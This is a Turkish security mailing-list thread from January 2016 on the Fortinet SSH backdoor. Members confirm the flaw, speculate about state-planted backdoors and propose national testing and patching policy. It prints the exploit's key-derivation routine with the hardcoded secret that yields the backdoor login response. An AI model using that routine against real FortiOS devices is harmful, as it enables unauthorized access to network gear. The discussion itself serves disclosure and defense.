Merhaba,
Bir backdoor kodu degil de daha cok static bir user name e gonderilen
numeric bir value ile ssh authentike ediyor gibi, toplu olarak onlarca
sisteme baglanıp guncelleme, bilesenleri degistirme gibi bir amacla
yapilmis gibi geldi bana.Yoksa base64 ile encode edilmis, hardcoded olarak
tanımlanmıs static bir key ile authantike etmesi boyle bir urun icin
dusuncesizce gelistirilmis bir mekanizma.
def custom_handler(title, instructions, prompt_list):
n = prompt_list[0][0]
m = hashlib.sha1()
m.update('\x00' * 12)
m.update(n + 'FGTAbc11*xy+Qqz27')
m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
return [h]
-- --
*Evgin DUYARLI*
RHCE,SCSA,SCNA,CCNA,CCIE Security
13 Ocak 2016 13:38 tarihinde Volkan Evrin <[email protected]> yazdı:
> Merhaba,
>
> Harika noktalara parmak basmissin Oguz, tespitler ve yol haritasindaki
> oneriler de cok yerinde.
>
> Ben, sahsen, 2 noktada ekleme/yorum yapmak istedim.
>
> 1 - Milli urun olmasi durumu yine kurtarmayacak, dun kurtarmadi (Tubitak -
> Kiriptolu telefonlar), bugun kurtarmiyor, yarin da kurtarmayacak... Nihai
> cozumun, acik kaynak kodlu ve ozgur yazilimlar ile beslenen bir guvenlik
> urun agacina dogru gitmek oldugunu dusunuyorum. Ak yazilim/donanim Kara
> yazilim/donanim belli olsun... Urunler "Kapali" kaldigi surece bugun milli
> olan yarin, farkli bir satinalma ile uluslararasi sirket olabilir.
>
> 2 - Bu denetim/sertifikalandirma ve onaylama sureclerinin ulke icinde
> olmasi dogru ve gerekli, ama devlet tekelinde ya da gudumunde olmamasi da
> cok onemli. Devlet memurunun ozluk/maas yapisi nedeni ile kalitesi eleman
> barindiramamasi ve devlet otoritesi ile uyumlu olmayanlara yapilan
> baskilar/zorlamalar oldukca, o denetim / onaylama sureci de her yerinde
> acik verir...
>
> Saygilar
> VolkanEvrin
>
>
> *Volkan Evrin*
> Kurumsal Uygulamalar ve Bilgi Güvenliği Müdürü
>
>
>
> *Ar-Ge Merkezi*
> D +90 850 251 6012
> F +90 312 267 0244
> www.karel.com.tr
>
> Bu e-posta işbu bağlantıyı kullanarak erişebileceğiniz koşullara tabidir:
> *http://www.karel.com.tr/eposta-hukuki-sartlari*
> <http://www.karel.com.tr/eposta-hukuki-sartlari>
>
> <http://www.karel.com.tr/urun-cozum/ipg1000-ip-santral>
>
> -------- Original Message --------
> Subject: Re: [NetSec] Fortinet SSH arkakapı
> From: Oğuz YILMAZ (LABRIS) <[email protected]>
> <[email protected]>
> To: [email protected] <[email protected]> <[email protected]>
> Date: 13-01-2016 13:05
>
> Merhaba,
>
> SOC merkezimiz test etti. Maalesef çalışıyor. ( test sistemi:
> v5.0,build0128 (GA) ).
>
> Bu açıkta; açığın/arkakapının düzenli incelemeleri sırasında kendileri
> tarafından belirlenmiş ve yamalanmış olmasını belirtmeleri önemlidir. Ancak
> bu ve benzer hataların sistematik olarak yerleştirilip yerleştirilmediği
> kontroversiyal bir konu olmaya devam edecektir.
>
> Son dönemde Juniper'de ve sonrasında Fortigate 'de çıkan bu ve benzeri
> zayıflıklar, inkar edilebilir bir sistematik arka kapı faaliyetinin parçası
> olabilir mi? Bu noktada, Snowden'in birkaç yıl önce açıkladığı belgelerde
> belli model cihazlar için NSA-GCHQ programı içinde erişim faaliyetleri
> olduğunu biliyoruz.
>
> Bu noktada Cisco'nun, cihazların kargosu esnasında çip bazında modifiye
> edilmesiyle ilgili geçtiğimiz seneki açıklamasını da hatırlatmak isterim.
>
> Benim hissettiğim bu istihbari erişim birkaç türlü oluyor.
> - Belli başlı hedef ürünlerin yüksek nitelikli zayıflık araştırmasını yap
> ve açıkları herkesten önce bul. Başkasının kullandığını görünce ifşa et,
> sonrakine geç.
> - Hedef ürünlerin geliştirme takımlarına eleman yerleştir ve kazara arka
> kapıları üret.
> - Hedef ürünlerin sertifikasyon şemalarını öyle yap ki belli zayıflıkları
> barındırmaya zorunlu olsunlar. (bu başlıkta daha önce okumadıysanız son
> Juniper açığının FIPS ile ilişkisine bir bakın:
> http://www.wired.com/2016/01/new-discovery-around-juniper-backdoor-raises-more-questions-about-the-company/
> )
>
> Ben son dönemlerde Google'ın önünü çektiği bir kısım özgürlükçü şirketin
> bu operasyonlardan biraz rahatsız olduklarını ve bu ifşaları
> hızlandırdıklarını düşünüyorum. Adı geçenlerin hangileri özgürlükçüdür,
> hangileri devletçidir(amerika-israil) bunu bilme noktasında olamayız. Bu
> kısımda farklı düşünenler olabilir, pek tabi. Bu kısım benim görüşlerim,
> biraz kontroversiyal olabilir ama düşünmek zorundayız.
>
> Buradan biraz daha ne yapacağız noktasına geçmek istiyorum. Bu kısım bu
> açığın nasıl oluştuğunda bağımsız.
> - Yama ve Zayıflık yönetimi. Güvenlik ürünleri firmware image olarak
> güncelleniyor. Bunların güncellemeleri hayli zahmetli. Artık yıllarıdır
> bizim uyguladığmız gibi sektördeki diğer ürünlerin de parçalı güncelleme
> ile yalnız ilgili yamayı reboot gerektirmeden alması gerekir.
> - Farklı marka 2 katmanlı ağ geçidi önemli. Kurumlar kendi hedef olma
> algılarına göre ürünlerin seçiminde dünya dengelerini gözetmek zorunda. Bu
> noktada Rus APT'lerini Avrupa, Amerikan APT'lerini Rus şirketlerinin ifşa
> ettiğini hatırlayalım. Uygun ise biri milli olmalı.
> - Güvenlik üreticileri düzenli iç ve dış ürün zayıflık analizleri
> yaptırmak zorunda.
> - Türkiye'ye giren nasıl her ilaca Sağlık Bakanlığı bir onay veriyorsa
> gümrükten geçen her güvenlik ve/veya ağ ürünü burada test edilmiş olmalı.
> Bu test çerçevesi zayıflık analiz dışında, cihazın veri iletişimlerinin
> analizini de (masumiyet analizi diyelim) içermelidir. Bu noktada yerli bir
> standart oluşturulmalı.
> - ISO sertifikasyonlarından ortak kriterler sertifikasyonu başlığında,
> bunun ülkeler arası tanınmasında yalnızca belli seviyeye kadar tanıma
> gerekiyor. Üzerinde yerli lab testleri gerektirilmeli. Burada Türk
> regülasyon sorumlularına görev düşüyor. Bunu farazi yazmadım. Amerika kendi
> ürünlerini ve ağlarını korumak için birebir benzeri bir mantığı uygulamak
> için harekete geçti. 2017 itibariyle EAL2 üzeri US'ten sertifikalanmış
> olmalı US'te geçerli olması için.
>
> Saygılarımla,
>
>
> --
>
> Oğuz YILMAZ
> CTO / Kurucu Ortak
> CTO / Co-founder
>
> (CISSP)
>
> Labris Networks
> Galyum Blok, ODTÜ Teknokent
> Ankara, Tü[email protected]
> T : +90 312 210 1490 (pbx)
> http://www.harppddos.comhttp://www.labrisnetworks.comhttp://www.facebook.com/labristeknolojihttps://twitter.com/#!/labrisnetworks
>
> (Global)https://twitter.com/#!/labristeknolojihttps://twitter.com/#!/oguzyilmaz79
>
>
>
> On 12.01.2016 10:41, Alper Basaran wrote:
>
> Merhaba,
>
> Fortinet OS 4 ile 5.0.7 arasındaki sürümlerde SSH backdoor açığıyla ilgili
> bir iddia var. Test edebilecek kimse varsa sonuçlarını paylaşması ilginç
> olabilir.
>
> İddia edilen saldırı koduna http://seclists.org/fulldisclosure/2016/Jan/26
> adresinden ulaşabilirsiniz.
>
> Saygılarımla,
> Alper Başaran
>
>
>
> -------------------
> DDOS Saldırıları ve Korunma Yolları Eğitimi
>
> İstanbul: 27-28 Şubat 2016
> Ankara: 03-04 Mart 2016
>
> -------------------
>
>
>
>
>
> -------------------
> DDOS Saldırıları ve Korunma Yolları Eğitimi
>
> İstanbul: 27-28 Şubat 2016
> Ankara: 03-04 Mart 2016
>
> -------------------
>
>
>
> -------------------
> DDOS Saldırıları ve Korunma Yolları Eğitimi
>
> İstanbul: 27-28 Şubat 2016
> Ankara: 03-04 Mart 2016
>
> -------------------
>
-------------------
DDOS Saldırıları ve Korunma Yolları Eğitimi
İstanbul: 27-28 Şubat 2016
Ankara: 03-04 Mart 2016
-------------------
